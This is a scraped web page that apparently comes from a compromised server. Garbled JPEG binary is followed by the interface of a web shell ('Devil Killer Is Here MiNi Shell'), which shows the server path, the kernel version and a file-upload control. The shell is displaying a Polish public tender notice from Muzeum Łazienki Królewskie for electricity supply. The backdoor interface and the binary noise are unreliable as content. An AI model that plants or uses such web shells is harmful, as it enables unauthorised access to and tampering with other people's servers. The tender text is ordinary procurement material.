JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211007/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211007/0022332001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa energii elektrycznej do MŁK zadanie nr 1 wraz z usługą odbioru i rozliczenia energii elektrycznej wprowadzonej do sieci OSD z mikroinstalacji Zamawiającego zadanie nr 2 na 2022 rok </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Muzeum Łazienki Królewskie w Warszawie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 369111140</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Agrykola 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">00-460</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">+48 22 50 60 024</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">+48 22 50 60 174</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@lazienki-krolewskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lazienki-krolewskie.pl/pl/bip</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - państwowe i samorządowe instytucje kultury</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Rekreacja, kultura i religia</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa energii elektrycznej do MŁK zadanie nr 1 wraz z usługą odbioru i rozliczenia energii elektrycznej wprowadzonej do sieci OSD z mikroinstalacji Zamawiającego zadanie nr 2 na 2022 rok </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f0b81b00-275a-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00223320</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00005537/09/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa energii elektrycznej do obiektów na terenie MŁK (nr 1) wraz z usługą odbioru i rozliczenia energii elektrycznej wprowadzonej do sieci OSD z mikroinstalacji Zamawiającego (nr 2) na 2022 rok</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://lazienki-krolewskie.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://lazienki-krolewskie.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja za pośrednictwem systemu dostępnego pod adresem<br/>https://lazienkikrolewskie.ezamawiajacy.pl. Instrukcja korzystania z Systemu jest dostępna pod wyżej<br/>wskazanym adresem w zakładce „Regulacje i procedury procesu zakupowego”. Niezbędne wymagania<br/>sprzętowo aplikacyjne do przekazania danych dotyczące systemu: stały dostęp do sieci Internet o<br/>gwarantowanej przepustowości nie mniejszej niż 512kb/s na komputer; komputer PC/MAC z aktualnym<br/>systemem operacyjnym wspieranym przez producenta; zainstalowana przeglądarka wspierana przez<br/>producenta: MS Internet Explorer, Firefox, Google Chrome lub MS Edge; włączona obsługa JavaScript;<br/>zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf. Format kodowania i<br/>oznaczania czasu: plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako<br/>zaszyfrowany – format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po<br/>odszyfrowaniu przez Zamawiającego po upływie terminu składania ofert; oznaczenie czasu odbioru<br/>danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss) generowany według czasu<br/>lokalnego serwera synchronizowanego odpowiednim źródłem czasu -zegarem Głównego Urzędu Miar.<br/>Ogólne zasady korzystania z Platformy: zgłoszenie do postępowania wymaga zalogowania<br/>Wykonawcy do Systemu na subdomenie Zamawiającego lub ttps://oneplace.marketplanet.pl;<br/>Wykonawca po wybraniu opcji „Przystąp do postępowania” zostanie przekierowany do strony<br/>https://oneplace.marketplanet.pl, gdzie zostanie powiadomiony o możliwości zalogowania lub do<br/>założenia bezpłatnego konta. Wykonawca zakłada konto wykonując kroki procesu rejestracyjnego;<br/>podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/>roboczych; Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu.<br/>Komunikacja między Zamawiającym a Wykonawcami, w szczególności zawiadomienia oraz informacje,<br/>przekazywane są w formie elektronicznej za pośrednictwem Platformy. Oferta, wniosek odopuszczenie do udziału w postępowaniu, oświadczenia, o których mowa w art. 125 ust. 1 PZP,<br/>podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa art. 117 ust 4 PZP, zobowiązanie<br/>podmiotu udostępniającego zasoby, przedmiotowe środki dowodowe, pełnomocnictwo sporządza się w<br/>postaci elektronicznej. Oferta, wniosek o dopuszczenie do udziału w postępowaniu, oświadczenia, o<br/>których mowa w art. 125 ust. 1 PZP, składa się pod rygorem nieważności w formie elektronicznej<br/>opatrzonej kwalifikowanym podpisem elektronicznym lub postaci elektronicznej opatrzonej podpisem<br/>zaufany lub podpisem osobistym złożonym przez Wykonawcę bezpośrednio na dokumencie, który<br/>następnie przesyła do systemu. Podmiotowe środki dowodowe, w tym oświadczenie, o którym mowa w<br/>art. 117 ust. 4 PZP, oraz zobowiązanie podmiotu udostępniającego zasoby, przedmiotowe środki<br/>dowodowe, oraz pełnomocnictwo przekazuje się w postaci elektronicznej i opatruje się kwalifikowanym<br/>podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym. Maksymalny rozmiar jednego<br/>pliku przesyłanego za pośrednictwem dedykowanych formularzy do: złożenia, zmiany, wycofania oferty<br/>wynosi 200 MB. 14. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .docx .xls .xlsx .jpg<br/>(.jpeg) ze szczególnym wskazaniem na .pdfW celu ewentualnej kompresji danych Zamawiający<br/>rekomenduje wykorzystanie jednego z rozszerzeń: .zip lub .7Z Wśród rozszerzeń powszechnych a<br/>niewystępujących w Rozporządzeniu KRI występują: .rar .gif .bmp .numbers .pages. Dokumenty<br/>złożone w takich plikach zostaną uznane za złożone nieskutecznie. Zamawiający zwraca uwagę na<br/>ograniczenia wielkości plików podpisywanych profilem zaufanym, który wynosi maksymalnie 10MB,<br/>oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp służącej do składania<br/>podpisu osobistego, który wynosi maksymalnie 5MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający informuję, że: 1)Administratorem Pani/Pana<br/>danych osobowych jest MŁK , ul. Agrykola 1, 00-460 Warszawa; 2)W sprawach związanych z ochroną danych osobowych można skontaktować się z Inspektorem Ochrony Danych powołanym przez MŁK,<br/>za pośrednictwem poczty elektronicznej, pod adresem e-mail: iod@lazienki-krolewskie.pl lub pisemnie na adres: ul. Agrykola 1, 00-460 Warszawa; 3)Pani/Pana dane osobowe przetwarzane będą na<br/>podstawie art. 6 ust. 1 lit. c RODO, tj. w wykonaniu obowiązku prawnego, w związku z postępowaniem o udzielenie zamówienia publicznego znak sprawy 17/2021/PZP, prowadzonym w trybie podstawowym<br/>bez prowadzenia negocjacji zgodnie z art. 275 pkt. 1 ustawy PZP; 4) odbiorcami Pani/Pana danych osobowych mogą być:•osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o art. 18 oraz art. 74 ustawy PZP, •inne organy państwowe i instytucje uprawnione do przeprowadzenia kontroli/audytów na podstawie odrębnych przepisów, •inne podmioty zewnętrzne wspierające administratora, czyli m.in. zapewniające usługi informatyczne, wykonujące usługi konsultingowe lub audytowe; 5) Pani/Pana dane osobowe będą przechowywane:•zgodnie z art. 78 ust.1 Ustawy PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy, •do czasu wniesienia sprzeciwu oraz uznania przez administratora, że sprzeciw ten jest zasadny (dotyczy to sytuacji, gdy podstawą przetwarzania jest prawnie uzasadniony interes administratora); 6) Podanie przez Panią/Pana swoich danych osobowych jest warunkiem ustawowym określonym w przepisach PZP niezbędnym do przeprowadzenia przedmiotowego postępowania o udzielenie zamówienia<br/>publicznego; 7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; 8)posiada Pani/Pan:•na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących (w przypadku, gdy skorzystanie z<br/>tego prawa wymagałoby po stronie administratora niewspółmiernie dużego wysiłku może zostać Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty postępowania o udzielenie zamówienia publicznego<br/>lub konkursu albo sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia), •na podstawie art. 16 RODO prawo do sprostowania lub uzupełnienia Pani/Pana danychosobowych (skorzystanie z prawa do sprostowania lub uzupełnienia nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą PZP oraz nie może naruszać integralności protokołu oraz jego załączników), •na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem okresu trwania postępowania o udzielenie zamówienia publicznego lub konkursu oraz przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego UE lub państwa<br/>członkowskiego),•prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 9) w zakresie prowadzonego postępowania nie przysługuje Pani/Panu: •w związku z art. 17 ust. 3 lit. b,<br/>d lub e RODO prawo do usunięcia danych osobowych, •prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, •na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust.<br/>1 lit. c RODO; 10) Pani/Pana dane osobowe nie będą przekazywane do Państw Trzecich, a więc państw leżących poza EOG.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Patrz Rozdział XXX SWZ - KLAUZULA INFORMACYJNA Z ART. 13 i ART. 14 RODO W CELU ZWIĄZANYM Z POSTĘPOWANIEM O UDZIELENIE ZAMÓWIENIA</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">17/2021/PZP</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> rzedmiotem zamówienia jest dostawa energii elektrycznej do wskazanych obiektów Muzeum <br/>(16 sztuk punktów PPE), a także dostawa energii elektrycznej wraz z usługą odbioru i rozliczenia energii elektrycznej wprowadzonej do sieci OSD z mikroinstalacji Zamawiającego (1 punkt PPF <br/>z fotowoltaiką) przez okres 12 miesięcy.<br/>Zamówienie zostało podzielone na zadania:<br/>a)	Zadanie nr 1 - obejmuje dostawę energii elektrycznej do 16 sztuk przyłączy PPE;<br/>b)	Zadanie nr 2 – dotyczy zarówno dostawy energii elektrycznej jak i usługi odbioru oraz rozliczenia energii elektrycznej wprowadzonej do sieci OSD z mikroinstalacji Zamawiającego (1 punkt PPF z fotowoltaiką) – bilansowanie.<br/>2.	Szczegółowy opis przedmiotu zamówienia zawiera Opis Przedmiotu Zamówienia stanowiący Załącznik nr 5 do SWZ wraz z wykazem obiektów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09310000-5 - Elektryczność</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">09300000-2 - Energia elektryczna, cieplna, słoneczna i jądrowa</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1.	Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami i ich wagą: <br/><br/>1)	Kryterium I – Cena – waga 100%<br/><br/>Ocenianym ofertom, zostaną przyznane punkty według następującego wzoru:<br/><br/>najniższa cena brutto pośród złożonych ważnych ofert <br/>Cena = ------------------------------------------------------------------------------------- x 100 pkt<br/>cena brutto badanej oferty <br/><br/>Maksymalna liczba punktów jaką może uzyskać oferta w kryterium oceny ofert jakim jest „Cena brutto” wynosi – 100 pkt.<br/>Standardy jakościowe, o których mowa w art. 246 ust. 2 ustawy z dnia 11 września 2019 r. Prawo<br/>Zamówień Publicznych (t.j. Dz. U. z 2021 r., poz. 1129 ze zm., dalej: „ustawa PZP”), zostały określone<br/>w opisie przedmiotu zamówienia, poprzez podanie parametrów technicznych produktu. Dokumenty<br/>opisujące przedmiot zamówienia są precyzyjne, i bez względu na to, kto będzie Wykonawcą<br/>(dostawcą) przedmiotu zamówienia, jedyną różnicą będą zaoferowane ceny (tzn. przedmiot<br/>zamówienia jest zestandaryzowany - identyczny, niezależnie od tego, który z Wykonawców go<br/>wykona). Dostawa energii elektrycznej to przedmiot zamówienia ogólnodostępny o określonych<br/>standardach jakościowych. Przez „ustalone standardy jakościowe" należy rozumieć: typy lub gatunki<br/>(dostaw/usług) znormalizowane, odpowiadające przeciętnym, oferowanym w powszechnej ofercie<br/>standardom, nie zaś specyficznym wymaganiom Zamawiającego, na skutek dostosowania standardu<br/>dostawy czy usługi do jego indywidualnych potrzeb, a zatem o jakości nie wymagającej indywidualnego<br/>ustalenia.<br/>Dostawę energii regulują przepisy, które ustalają i normalizują standardy jakościowe energii<br/>elektrycznej. Każdy z dostawców energii elektrycznej musi zapewnić parametry zgodne z ustawą z<br/>dnia 10 kwietnia 1997 r. Prawo Energetyczne (t.j. Dz.U. z 2021 r., poz. 716 ze zm.) i rozporządzeniami<br/>wykonawczymi do tej ustawy, aby uzyskać koncesję na obrót tą energią wydawaną przez Prezesa<br/>Urzędu Regulacji Energetyki. Ponadto dostawcy ponoszą odpowiedzialność ekonomiczną za<br/>ewentualne niedotrzymanie parametrów technicznych energii elektrycznej zgodnie z art. 45a ust. 3 ww.<br/>ustawy. W związku z powyższym Zamawiający jest upoważniony do zastosowania ceny, jako jedynego<br/>kryterium wyboru oferty najkorzystniejszej.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1)	nie podlegają wykluczeniu;<br/>2)	spełniają warunki udziału w postępowaniu dotyczące:<br/>a)	zdolności do występowania w obrocie gospodarczym - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;<br/>b)	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej <br/>o ile wynika to z odrębnych przepisów - Zamawiający uzna za spełniony warunek <br/>w tym zakresie, jeżeli Wykonawca wykaże, że: posiada aktualną koncesję na prowadzenie działalności gospodarczej w zakresie obrotu energią elektryczną wydaną przez Prezesa URE;<br/>c)	sytuacji ekonomicznej lub finansowej - Zamawiający nie wyznacza szczegółowego warunku w tym zakresie;<br/>d)	zdolności technicznej lub zawodowej - Zamawiający uzna za spełniony warunek <br/>w tym zakresie, jeżeli Wykonawca wykaże, że: w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał lub w przypadku świadczeń okresowych lub ciągłych wykonuje, dla co najmniej 3 odbiorców, dostawę energii elektrycznej w rozmiarze co najmniej 1.000.000 kWh w skali roku dla każdego odbiorcy; <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">7.	W celu potwierdzenia braku podstaw wykluczenia Wykonawcy, Wykonawca składa następujące podmiotowe środki dowodowe:<br/>1)	oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5) Ustawy PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r. poz. 275 ze zm.), z innym Wykonawca, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie <br/>do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie <br/>od innego wykonawcy należącego do tej samej grupy kapitałowej – załącznik nr 8 do SWZ;<br/>2)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 109 ust. 1 pkt 4 Ustawy, wystawioną nie wcześniej niż 3 miesiące przed jej złożeniem;<br/>3)	Informacja z Krajowego Rejestru Karnego w zakresie art. 108 ust. 1 pkt 1 i 2 Ustawy PZP, art. 108 ust. 1 pkt 4 Ustawy PZP dotyczącej orzeczenia zakazu ubiegania się o zamówienie publiczne tytułem środka karnego, sporządzonej nie wcześniej niż 6 miesięcy przed jej złożeniem;<br/>4)	oświadczenie Wykonawcy w zakresie art. art. 109 ust. 1 pkt. 7) o należytym wykonaniu istotnych zobowiązań wynikających z wcześniejszej umowy w sprawie zamówienia publicznego lub umowy koncesji, że nie doszło do wypowiedzenia lub odstąpienia <br/>od umowy, że wykonawca nie został zobowiązany do zapłaty odszkodowania, nie doszło <br/>do wykonania zastępczego lub realizacji uprawnień z tytułu rękojmi za wady, na formularzu stanowiącym Załącznik nr 3d do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.	W celu potwierdzenia spełnienia przez 